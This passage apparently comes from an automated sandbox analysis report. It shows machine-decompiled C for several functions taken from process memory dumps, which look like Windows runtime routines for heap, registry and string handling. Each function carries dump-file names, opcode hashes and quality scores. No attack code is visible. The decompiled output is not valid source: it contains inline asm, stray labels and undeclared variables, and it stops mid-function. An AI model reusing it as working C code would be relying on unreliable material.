                        						if((_t106 & 0x00000002) != 0) {
                        							_push(0x200);
                        							_push(0x28);
                        							_push(0xffffffff);
                        							_t122 = E02BD9800();
                        							if(_t122 < 0) {
                        								L33:
                        								if((_t124[4] & 0x00000001) != 0) {
                        									_push(4);
                        									_t64 =  &(_t124[1]); // 0x4
                        									_t107 = _t64;
                        									_push(_t107);
                        									_push(5);
                        									_push(0xfffffffe);
                        									E02BD95B0();
                        									if( *_t107 != 0) {
                        										_push( *_t107);
                        										E02BD95D0();
                        									}
                        								}
                        								_push(_t124);
                        								_push(0);
                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        								L37:
                        								L02BB77F0();
                        								return _t122;
                        							}
                        							_t124[4] = _t124[4] | 0x00000002;
                        							L18:
                        							_t108 = _a8;
                        							_t29 =  &(_t124[0x105]); // 0x414
                        							_t80 = _t29;
                        							_t30 =  &(_t124[5]); // 0x14
                        							_t124[3] = _t80;
                        							_t123 = 0;
                        							_t124[2] = _t30;
                        							 *_t80 = _t108;
                        							if(_t108 == 0) {
                        								L21:
                        								_t112 = 0x400;
                        								_push( &_v8);
                        								_v8 = 0x400;
                        								_push(_t124[2]);
                        								_push(0x400);
                        								_push(_t124[3]);
                        								_push(0);
                        								_push( *_t124);
                        								_t122 = E02BD9910();
                        								if(_t122 != 0xc0000023) {
                        									L26:
                        									if(_t122 != 0x106) {
                        										L40:
                        										if(_t122 < 0) {
                        											L29:
                        											_t83 = _t124[2];
                        											if(_t83 != 0) {
                        												_t59 =  &(_t124[5]); // 0x14
                        												if(_t83 != _t59) {
                        													L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                        												}
                        											}
                        											_push( *_t124);
                        											E02BD95D0();
                        											goto L33;
                        										}
                        										 *_a16 = _t124;
                        										return 0;
                        									}
                        									if(_t108 != 1) {
                        										_t122 = 0;
                        										goto L40;
                        									}
                        									_t122 = 0xc0000061;
                        									goto L29;
                        								} else {
                        									goto L22;
                        								}
                        								while(1) {
                        									L22:
                        									_t89 =  *0x2c87b9c; // 0x0
                        									_t92 = L02BB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                        									_t124[2] = _t92;
                        									if(_t92 == 0) {
                        										break;
                        									}
                        									_t112 =  &_v8;
                        									_push( &_v8);
                        									_push(_t92);
                        									_push(_v8);
                        									_push(_t124[3]);
                        									_push(0);
                        									_push( *_t124);
                        									_t122 = E02BD9910();
                        									if(_t122 != 0xc0000023) {
                        										goto L26;
                        									}
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                        								}
                        								_t122 = 0xc0000017;
                        								goto L26;
                        							}
                        							_t119 = 0;
                        							do {
                        								_t114 = _t124[3];
                        								_t119 = _t119 + 0xc;
                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                        								_t123 = _t123 + 1;
                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                        							} while (_t123 < _t108);
                        							goto L21;
                        						}
                        						_push(0x28);
                        						_push(3);
                        						_t122 = E02B9A7B0();
                        						if(_t122 < 0) {
                        							goto L33;
                        						}
                        						_t124[4] = _t124[4] | 0x00000001;
                        						goto L18;
                        					}
                        					if((_t106 & 0x00000001) == 0) {
                        						_t115 = 0x28;
                        						_t122 = E02C2E7D3(_t115, _t124);
                        						if(_t122 < 0) {
                        							L9:
                        							_push(_t124);
                        							_push(0);
                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        							goto L37;
                        						}
                        						L12:
                        						if( *_t124 != 0) {
                        							goto L18;
                        						}
                        						goto L13;
                        					}
                        					_t15 =  &(_t124[1]); // 0x4
                        					_t117 = 4;
                        					_t122 = E02C2E7D3(_t117, _t15);
                        					if(_t122 >= 0) {
                        						_t124[4] = _t124[4] | 0x00000001;
                        						_v12 = _v12 & 0x00000000;
                        						_push(4);
                        						_push( &_v12);
                        						_push(5);
                        						_push(0xfffffffe);
                        						E02BD95B0();
                        						goto L12;
                        					}
                        					goto L9;
                        				} else {
                        					return 0xc0000017;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8967775d02f245f31e48d0a10135202f15bc5550503cf6c0444a5e1dfbcfca74
                        • Instruction ID: 8c7505af2989b7360103d959938ba710c34b705481b285865265b9c0fe599d7f
                        • Opcode Fuzzy Hash: 8967775d02f245f31e48d0a10135202f15bc5550503cf6c0444a5e1dfbcfca74
                        • Instruction Fuzzy Hash: 17711F32240B11EFD721DF25C844F66B7B6EF80728F144968E6559B2A0EF71EE48CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02C16DC9(signed int __ecx, void* __edx) {
                        				unsigned int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				char _v60;
                        				void* _t87;
                        				void* _t95;
                        				signed char* _t96;
                        				signed int _t107;
                        				signed int _t136;
                        				signed char* _t137;
                        				void* _t157;
                        				void* _t161;
                        				void* _t167;
                        				intOrPtr _t168;
                        				void* _t174;
                        				void* _t175;
                        				signed int _t176;
                        				void* _t177;
                        
                        				_t136 = __ecx;
                        				_v44 = 0;
                        				_t167 = __edx;
                        				_v40 = 0;
                        				_v36 = 0;
                        				_v32 = 0;
                        				_v60 = 0;
                        				_v56 = 0;
                        				_v52 = 0;
                        				_v48 = 0;
                        				_v16 = __ecx;
                        				_t87 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                        				_t175 = _t87;
                        				if(_t175 != 0) {
                        					_t11 = _t175 + 0x30; // 0x30
                        					 *((short*)(_t175 + 6)) = 0x14d4;
                        					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                        					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                        					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                        					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                        					E02C16B4C(_t167, _t11, 0x214,  &_v8);
                        					_v12 = _v8 + 0x10;
                        					_t95 = E02BB7D50();
                        					_t137 = 0x7ffe0384;
                        					if(_t95 == 0) {
                        						_t96 = 0x7ffe0384;
                        					} else {
                        						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t175);
                        					_push(_v12);
                        					_push(0x402);
                        					_push( *_t96 & 0x000000ff);
                        					E02BD9AE0();
                        					_t87 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                        					_t176 = _v16;
                        					if((_t176 & 0x00000100) != 0) {
                        						_push( &_v36);
                        						_t157 = 4;
                        						_t87 = E02C1795D( *((intOrPtr*)(_t167 + 8)), _t157);
                        						if(_t87 >= 0) {
                        							_v24 = E02C1795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                        							_v28 = E02C1795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                        							_push( &_v52);
                        							_t161 = 5;
                        							_t168 = E02C1795D( *((intOrPtr*)(_t167 + 8)), _t161);
                        							_v20 = _t168;
                        							_t107 = L02BB4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                        							_v16 = _t107;
                        							if(_t107 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        								 *(_t107 + 0x20) = _t176;
                        								 *((short*)(_t107 + 6)) = 0x14d5;
                        								_t47 = _t107 + 0x24; // 0x24
                        								_t177 = _t47;
                        								E02C16B4C( &_v36, _t177, 0xc78,  &_v8);
                        								_t51 = _v8 + 4; // 0x4
                        								_t178 = _t177 + (_v8 >> 1) * 2;
                        								_v12 = _t51;
                        								E02C16B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_v12 = _v12 + _v8;
                        								E02C16B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_t125 = _v8;
                        								_v12 = _v12 + _v8;
                        								E02C16B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                        								_t174 = _v12 + _v8;
                        								if(E02BB7D50() != 0) {
                        									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								}
                        								_push(_v16);
                        								_push(_t174);
                        								_push(0x402);
                        								_push( *_t137 & 0x000000ff);
                        								E02BD9AE0();
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                        								_t168 = _v20;
                        							}
                        							_t87 = L02BB2400( &_v36);
                        							if(_v24 >= 0) {
                        								_t87 = L02BB2400( &_v44);
                        							}
                        							if(_t168 >= 0) {
                        								_t87 = L02BB2400( &_v52);
                        							}
                        							if(_v28 >= 0) {
                        								return L02BB2400( &_v60);
                        							}
                        						}
                        					}
                        				}
                        				return _t87;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 1be61a4a3dc309ee289f5d3293a3ef74fe93567e8e4aac9c00cb64615f0406bd
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 0C717C71A00619EFCB11DFA5C984AEEFBB9FF88704F144069E505A7250DB30EA45EF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B952A5(char __ecx) {
                        				char _v20;
                        				char _v28;
                        				char _v29;
                        				void* _v32;
                        				void* _v36;
                        				void* _v37;
                        				void* _v38;
                        				void* _v40;
                        				void* _v46;
                        				void* _v64;
                        				void* __ebx;
                        				intOrPtr* _t49;
                        				signed int _t53;
                        				short _t85;
                        				signed int _t87;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t101;
                        				intOrPtr* _t102;
                        				intOrPtr* _t104;
                        				signed int _t106;
                        				void* _t108;
                        
                        				_t93 = __ecx;
                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                        				_push(_t88);
                        				_v29 = __ecx;
                        				_t89 = _t88 | 0xffffffff;
                        				while(1) {
                        					E02BAEEF0(0x2c879a0);
                        					_t104 =  *0x2c88210; // 0x2732bd8
                        					if(_t104 == 0) {
                        						break;
                        					}
                        					asm("lock inc dword [esi]");
                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                        					E02BAEB70(_t93, 0x2c879a0);
                        					if( *((char*)(_t108 + 0xf)) != 0) {
                        						_t101 =  *0x7ffe02dc;
                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                        							L9:
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0x90028);
                        							_push(_t108 + 0x20);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push( *((intOrPtr*)(_t104 + 4)));
                        							_t53 = E02BD9890();
                        							__eflags = _t53;
                        							if(_t53 >= 0) {
                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        									E02BAEEF0(0x2c879a0);
                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                        									E02BAEB70(0, 0x2c879a0);
                        								}
                        								goto L3;
                        							}
                        							__eflags = _t53 - 0xc0000012;
                        							if(__eflags == 0) {
                        								L12:
                        								_t13 = _t104 + 0xc; // 0x2732be5
                        								_t93 = _t13;
                        								 *((char*)(_t108 + 0x12)) = 0;
                        								__eflags = E02BCF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								if(__eflags >= 0) {
                        									L15:
                        									_t102 = _v28;
                        									 *_t102 = 2;
                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        									E02BAEEF0(0x2c879a0);
                        									__eflags =  *0x2c88210 - _t104; // 0x2732bd8
                        									if(__eflags == 0) {
                        										__eflags =  *((char*)(_t108 + 0xe));
                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                        										 *0x2c88210 = _t102;
                        										_t32 = _t102 + 0xc; // 0x0
                        										 *_t95 =  *_t32;
                        										_t33 = _t102 + 0x10; // 0x0
                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                        										_t35 = _t102 + 4; // 0xffffffff
                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                        										if(__eflags != 0) {
                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                        											E02C14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                        										}
                        										E02BAEB70(_t95, 0x2c879a0);
                        										asm("lock xadd [esi], eax");
                        										if(__eflags == 0) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02BD95D0();
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										asm("lock xadd [esi], ebx");
                        										__eflags = _t89 == 1;
                        										if(_t89 == 1) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E02BD95D0();
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										_t49 = _t102;
                        										L4:
                        										return _t49;
                        									}
                        									E02BAEB70(_t93, 0x2c879a0);
                        									asm("lock xadd [esi], eax");
                        									if(__eflags == 0) {
                        										_push( *((intOrPtr*)(_t104 + 4)));
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        									}
                        									 *_t102 = 1;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										_t28 = _t102 + 4; // 0xffffffff
                        										_push( *_t28);
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        									}
                        									continue;
                        								}
                        								_t93 =  &_v20;
                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                        								_t85 = 6;
                        								_v20 = _t85;
                        								_t87 = E02BCF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								__eflags = _t87;
                        								if(_t87 < 0) {
                        									goto L3;
                        								}
                        								 *((char*)(_t108 + 0xe)) = 1;
                        								goto L15;
                        							}
                        							__eflags = _t53 - 0xc000026e;
                        							if(__eflags != 0) {
                        								goto L3;
                        							}
                        							goto L12;
                        						}
                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                        							goto L3;
                        						} else {
                        							goto L9;
                        						}
                        					}
                        					L3:
                        					_t49 = _t104;
                        					goto L4;
                        				}
                        				_t49 = 0;
                        				goto L4;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 7416dd16262ec4a377432cc390212df0ff6a2ed21289e60f7172a79e1f4fc000
                        • Instruction ID: 9de21a7f6e401889c7e7dd15a490039ea30a2ea6ede13519824eff0ca4a48706
                        • Opcode Fuzzy Hash: 7416dd16262ec4a377432cc390212df0ff6a2ed21289e60f7172a79e1f4fc000
                        • Instruction Fuzzy Hash: 0C51F171149741AFDB21EF28C840B27FBE5FF44714F1049AEE49587661E770E848CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                        				signed short* _v8;
                        				signed short* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				short _t56;
                        				signed int _t57;
                        				intOrPtr _t58;
                        				signed short* _t61;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				intOrPtr _t84;
                        				intOrPtr _t87;
                        				intOrPtr* _t90;
                        				signed short* _t91;
                        				signed int _t95;
                        				signed short* _t96;
                        				intOrPtr _t97;
                        				intOrPtr _t102;
                        				signed int _t108;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed short* _t112;
                        				void* _t113;
                        				signed int _t116;
                        				signed short** _t119;
                        				short* _t120;
                        				signed int _t123;
                        				signed int _t124;
                        				void* _t125;
                        				intOrPtr _t127;
                        				signed int _t128;
                        
                        				_t90 = __ecx;
                        				_v16 = __edx;
                        				_t108 = _a4;
                        				_v28 = __ecx;
                        				_t4 = _t108 - 1; // -1
                        				if(_t4 > 0x13) {
                        					L15:
                        					_t56 = 0xc0000100;
                        					L16:
                        					return _t56;
                        				}
                        				_t57 = _t108 * 0x1c;
                        				_v32 = _t57;
                        				_t6 = _t57 + 0x2c88204; // 0x0
                        				_t123 =  *_t6;
                        				_t7 = _t57 + 0x2c88208; // 0x2c88207
                        				_t8 = _t57 + 0x2c88208; // 0x2c88207
                        				_t119 = _t8;
                        				_v36 = _t123;
                        				_t110 = _t7 + _t123 * 8;
                        				_v24 = _t110;
                        				_t111 = _a4;
                        				if(_t119 >= _t110) {
                        					L12:
                        					if(_t123 != 3) {
                        						_t58 =  *0x2c88450; // 0x27310fc
                        						if(_t58 == 0) {
                        							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                        						}
                        					} else {
                        						_t26 = _t57 + 0x2c8821c; // 0x0
                        						_t58 =  *_t26;
                        					}
                        					 *_t90 = _t58;
                        					goto L15;
                        				} else {
                        					goto L2;
                        				}
                        				while(1) {
                        					_t116 =  *_t61 & 0x0000ffff;
                        					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        					if(_t116 == _t128) {
                        						goto L18;
                        					}
                        					L5:
                        					if(_t116 >= 0x61) {
                        						if(_t116 > 0x7a) {
                        							_t97 =  *0x2c86d5c; // 0x7ff00654
                        							_t72 =  *0x2c86d5c; // 0x7ff00654
                        							_t75 =  *0x2c86d5c; // 0x7ff00654
                        							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                        						} else {
                        							_t116 = _t116 - 0x20;
                        						}
                        					}
                        					if(_t128 >= 0x61) {
                        						if(_t128 > 0x7a) {
                        							_t102 =  *0x2c86d5c; // 0x7ff00654
                        							_t84 =  *0x2c86d5c; // 0x7ff00654
                        							_t87 =  *0x2c86d5c; // 0x7ff00654
                        							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                        						} else {
                        							_t128 = _t128 - 0x20;
                        						}
                        					}
                        					if(_t116 == _t128) {
                        						_t61 = _v12;
                        						_t96 = _v8;
                        					} else {
                        						_t113 = _t116 - _t128;
                        						L9:
                        						_t111 = _a4;
                        						if(_t113 == 0) {
                        							_t115 =  &(( *_t119)[_t111 + 1]);
                        							_t33 =  &(_t119[1]); // 0x100
                        							_t120 = _a8;
                        							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                        							_t35 = _t95 - 1; // 0xff
                        							_t124 = _t35;
                        							if(_t120 == 0) {
                        								L27:
                        								 *_a16 = _t95;
                        								_t56 = 0xc0000023;
                        								goto L16;
                        							}
                        							if(_t124 >= _a12) {
                        								if(_a12 >= 1) {
                        									 *_t120 = 0;
                        								}
                        								goto L27;
                        							}
                        							 *_a16 = _t124;
                        							_t125 = _t124 + _t124;
                        							E02BDF3E0(_t120, _t115, _t125);
                        							_t56 = 0;
                        							 *((short*)(_t125 + _t120)) = 0;
                        							goto L16;
                        						}
                        						_t119 =  &(_t119[2]);
                        						if(_t119 < _v24) {
                        							L2:
                        							_t91 =  *_t119;
                        							_t61 = _t91;
                        							_v12 = _t61;
                        							_t112 =  &(_t61[_t111]);
                        							_v8 = _t112;
                        							if(_t61 >= _t112) {
                        								break;
                        							} else {
                        								_t127 = _v16 - _t91;
                        								_t96 = _t112;
                        								_v20 = _t127;
                        								_t116 =  *_t61 & 0x0000ffff;
                        								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        								if(_t116 == _t128) {
                        									goto L18;
                        								}
                        								goto L5;
                        							}
                        						} else {
                        							_t90 = _v28;
                        							_t57 = _v32;
                        							_t123 = _v36;
                        							goto L12;
                        						}
                        					}
                        					L18:
                        					_t61 =  &(_t61[1]);
                        					_v12 = _t61;
                        					if(_t61 >= _t96) {
                        						break;
                        					}
                        					_t127 = _v20;
                        				}
                        				_t113 = 0;
                        				goto L9;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 3148e527dc0f969df253b72df349743e080e391378e71815a2163304fbb71c72
                        • Instruction ID: b47dbf644af7716014b605980f6201d59fce9be113dfc116959744f26af9c3ce
                        • Opcode Fuzzy Hash: 3148e527dc0f969df253b72df349743e080e391378e71815a2163304fbb71c72
                        • Instruction Fuzzy Hash: A6518176A00115CFCB18DF2DC890ABDB7B1FB88704726859EEC56AB354E734AE51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02C5AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __esi;
                        				void* __ebp;
                        				signed short* _t36;
                        				signed int _t41;
                        				char* _t42;
                        				intOrPtr _t43;
                        				signed int _t47;
                        				void* _t52;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed char _t62;
                        				signed int _t72;
                        				signed char _t85;
                        				signed int _t88;
                        
                        				_t73 = __edx;
                        				_push(__ecx);
                        				_t85 = __ecx;
                        				_v8 = __edx;
                        				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                        				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                        				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                        					_t57 = _t57 | 0x00000001;
                        				}
                        				_t88 = 0;
                        				_t36 = 0;
                        				_t96 = _a12;
                        				if(_a12 == 0) {
                        					_t62 = _a8;
                        					__eflags = _t62;
                        					if(__eflags == 0) {
                        						goto L12;
                        					}
                        					_t52 = E02C5C38B(_t85, _t73, _t57, 0);
                        					_t62 = _a8;
                        					 *_t62 = _t52;
                        					_t36 = 0;
                        					goto L11;
                        				} else {
                        					_t36 = E02C5ACFD(_t85, _t73, _t96, _t57, _a8);
                        					if(0 == 0 || 0 == 0xffffffff) {
                        						_t72 = _t88;
                        					} else {
                        						_t72 =  *0x00000000 & 0x0000ffff;
                        					}
                        					 *_a12 = _t72;
                        					_t62 = _a8;
                        					L11:
                        					_t73 = _v8;
                        					L12:
                        					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                        						L19:
                        						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                        							L22:
                        							_t74 = _v8;
                        							__eflags = _v8;
                        							if(__eflags != 0) {
                        								L25:
                        								__eflags = _t88 - 2;
                        								if(_t88 != 2) {
                        									__eflags = _t85 + 0x44 + (_t88 << 6);
                        									_t88 = E02C5FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                        									goto L34;
                        								}
                        								L26:
                        								_t59 = _v8;
                        								E02C5EA55(_t85, _v8, _t57);
                        								asm("sbb esi, esi");
                        								_t88 =  ~_t88;
                        								_t41 = E02BB7D50();
                        								__eflags = _t41;
                        								if(_t41 == 0) {
                        									_t42 = 0x7ffe0380;
                        								} else {
                        									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								}
                        								__eflags =  *_t42;
                        								if( *_t42 != 0) {
                        									_t43 =  *[fs:0x30];
                        									__eflags =  *(_t43 + 0x240) & 0x00000001;
                        									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                        										__eflags = _t88;
                        										if(_t88 != 0) {
                        											E02C51608(_t85, _t59, 3);
                        										}
                        									}
                        								}
                        								goto L34;
                        							}
                        							_push(_t62);
                        							_t47 = E02C61536(0x2c88ae4, (_t74 -  *0x2c88b04 >> 0x14) + (_t74 -  *0x2c88b04 >> 0x14), _t88, __eflags);
                        							__eflags = _t47;
                        							if(_t47 == 0) {
                        								goto L26;
                        							}
                        							_t74 = _v12;
                        							_t27 = _t47 - 1; // -1
                        							_t88 = _t27;
                        							goto L25;
                        						}
                        						_t62 = _t85;
                        						if(L02C5C323(_t62, _v8, _t57) != 0xffffffff) {
                        							goto L22;
                        						}
                        						_push(_t62);
                        						_push(_t88);
                        						E02C5A80D(_t85, 9, _v8, _t88);
                        						goto L34;
                        					} else {
                        						_t101 = _t36;
                        						if(_t36 != 0) {
                        							L16:
                        							if(_t36 == 0xffffffff) {
                        								goto L19;
                        							}
                        							_t62 =  *((intOrPtr*)(_t36 + 2));
                        							if((_t62 & 0x0000000f) == 0) {
                        								goto L19;
                        							}
                        							_t62 = _t62 & 0xf;
                        							if(E02C3CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                        								L34:
                        								return _t88;
                        							}
                        							goto L19;
                        						}
                        						_t62 = _t85;
                        						_t36 = E02C5ACFD(_t62, _t73, _t101, _t57, _t62);
                        						if(_t36 == 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        			}
                        0x02c5aee4
                        0x00000000
                        0x00000000
                        0x02c5aee6
                        0x02c5aeec
                        0x00000000
                        0x00000000
                        0x02c5aefb
                        0x02c5af07
                        0x02c5afd3
                        0x02c5afdb
                        0x02c5afdb
                        0x00000000
                        0x02c5af07
                        0x02c5aed6
                        0x02c5aed8
                        0x02c5aedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c5aedf
                        0x02c5aec9

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea90d092cd2b018ed1bb2da521ff187267fa8714900da5c62ab16f0d3e0f299d
                        • Instruction ID: a8864fb8625b9dbc3a141a20e465b8daee0a93e37e0ba8b9d3fa842bd4aa981a
                        • Opcode Fuzzy Hash: ea90d092cd2b018ed1bb2da521ff187267fa8714900da5c62ab16f0d3e0f299d
                        • Instruction Fuzzy Hash: E64128B27006705BC726CB27C894B7BB79AEFC4724F044319FC5687290DB75DA81DAA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02BBDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				char _v5;
                        				signed int _v12;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t54;
                        				char* _t58;
                        				signed int _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				signed int* _t75;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				char _t82;
                        				signed int _t83;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t89;
